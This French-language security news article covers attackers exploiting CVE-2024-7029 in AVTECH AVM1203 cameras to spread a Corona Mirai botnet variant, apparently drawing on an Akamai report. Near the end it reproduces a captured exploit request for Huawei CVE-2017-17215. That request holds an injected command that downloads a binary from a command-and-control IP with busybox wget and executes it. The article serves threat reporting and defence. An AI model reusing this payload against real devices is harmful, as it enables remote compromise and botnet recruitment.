Des hackers malveillants exploitent une vulnérabilité critique dans une caméra de sécurité largement utilisée pour propager Mirai, une famille de malwares qui prend le contrôle des dispositifs connectés à Internet pour les rassembler en grands réseaux afin de mener des attaques qui perturbent des sites web et d’autres appareils connectés.
Les attaques ciblent l’AVM1203, un dispositif de surveillance du fabricant taïwanais AVTECH, comme l’a rapporté le fournisseur de sécurité réseau Akamai mercredi. Des attaquants inconnus exploitent une vulnérabilité vieille de cinq ans depuis mars. Cette vulnérabilité zero-day, suivie sous le nom CVE-2024-7029, est facile à exploiter et permet aux attaquants d’exécuter du code malveillant. L’AVM1203 n’est plus vendu ni supporté, donc aucune mise à jour n’est disponible pour corriger cette vulnérabilité critique.
Une armée hétéroclite a secoué Internet
Akamai a déclaré que les attaquants exploitent cette vulnérabilité pour installer une variante de Mirai, qui est apparue en septembre 2016 lorsqu’un botnet d’appareils infectés a pris d’assaut le site de nouvelles en cybersécurité Krebs on Security. Mirai contenait des fonctionnalités permettant à une armée disparate de webcams compromises, de routeurs et d’autres types de dispositifs IoT de mener des attaques par déni de service distribué de taille record. Dans les semaines qui ont suivi, le botnet Mirai a délivré des attaques similaires contre des fournisseurs de services Internet et d’autres cibles, notamment une attaque contre le fournisseur de noms de domaine Dyn, qui a paralyser de vastes parties d’Internet. Les tentatives de contenir Mirai ont été compliquées lorsque ses créateurs ont rendu le malware public, permettant pratiquement à quiconque de créer ses propres botnets capables de réaliser des DDoS d’une taille autrefois inimaginable.
Kyle Lefton, chercheur en sécurité au sein de l’équipe de sécurité et réponse d’Akamai, a déclaré dans un e-mail qu’il avait observé l’acteur malveillant derrière les attaques mener des DDoS contre “différentes organisations,” qu’il n’a pas nommées ni décrites davantage. Jusqu’à présent, l’équipe n’a noté aucune indication que ces acteurs surveillent des flux vidéo ou utilisent les caméras infectées à d’autres fins.
Akamai a détecté l’activité en utilisant un “honeypot” de dispositifs imitant les caméras sur Internet ouvert afin d’observer les attaques qui les ciblent. Cette technique ne permet cependant pas aux chercheurs d’évaluer la taille du botnet. L’Agence de cybersécurité et de sécurité des infrastructures des États-Unis a mis en garde contre cette vulnérabilité plus tôt ce mois-ci.
Cette technique a néanmoins permis à Akamai de capturer le code utilisé pour compromettre les dispositifs. Elle cible une vulnérabilité connue depuis au moins 2019, lorsque le code d’exploitation est devenu public. La vulnérabilité zero-day réside dans le “paramètre de luminosité” dans le paramètre ‘action=’ et permet l’injection de commandes, ont écrit les chercheurs. La vulnérabilité zero-day, découverte par la chercheuse d’Akamai Aline Eliovich, n’a pas été formellement reconnue avant ce mois-ci avec la publication de CVE-2024-7029.
Comment cela fonctionne-t-il ?
Cette vulnérabilité a été initialement découverte en examinant les journaux de notre honeypot. La figure 1 montre l’URL décodée pour plus de clarté.
La vulnérabilité réside dans la fonction de luminosité dans le fichier /cgi-bin/supervisor/Factory.cgi (Figure 2).
Que pourrait-il se passer ?
Dans les exemples d’exploitation que nous avons observés, ce qui s’est essentiellement passé est le suivant : l’exploitation de cette vulnérabilité permet à un attaquant d’exécuter du code à distance sur un système cible.
La figure 3 est un exemple d’un acteur malveillant exploitant ce défaut pour télécharger et exécuter un fichier JavaScript afin de récupérer et charger leur principal payload malveillant. Comme beaucoup d’autres botnets, celui-ci propage également une variante du malware Mirai à ses cibles.
Dans cet exemple, le botnet utilise probablement la variante Corona Mirai, qui a été référencée par d’autres fournisseurs dès 2020 en lien avec le virus COVID-19.
Lors de son exécution, le malware se connecte à un grand nombre d’hôtes via Telnet sur les ports 23, 2323 et 37215. Il affiche également la chaîne “Corona” dans la console sur un hôte infecté (Figure 4).
L’analyse statique des chaînes dans les échantillons de malware montre qu’ils ciblent le chemin /ctrlt/DeviceUpgrade_1 dans une tentative d’exploiter des dispositifs Huawei affectés par CVE-2017-17215. Les échantillons contiennent deux adresses IP de commande et de contrôle codées en dur, dont l’une fait partie du code d’exploitation de CVE-2017-17215 :
POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Content-Length: 430
Connection: keep-alive
Accept: */*
Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
$(/bin/busybox wget -g 45.14.244[.]89 -l /tmp/mips -r /mips; /bin/busybox chmod 777 * /tmp/mips; /tmp/mips huawei.rep)$(echo HUAWEIUPNP)
Le botnet a également ciblé plusieurs autres vulnérabilités, y compris un RCE Hadoop YARN, CVE-2014-8361, et CVE-2017-17215. Nous avons observé ces vulnérabilités exploitées dans la nature à plusieurs reprises, et elles continuent de réussir.
Étant donné que ce modèle de caméra n’est plus supporté, la meilleure chose à faire pour quiconque continuant à l’utiliser est de la remplacer. Comme avec tous les appareils connectés à Internet, les dispositifs IoT ne devraient jamais être accessibles avec les identifiants par défaut fournis à l’achat.
Pour conclure, cet événement met en lumière l’importance de maintenir une bonne hygiène numérique, en effectuant des mises à jour des appareils et en remplaçant ceux qui ne sont plus sécurisés. Ignorer ces mises en garde pourrait exposer vos systèmes à des risques significatifs. Nous devons tous être vigilants pour protéger nos données et nos appareils en ligne.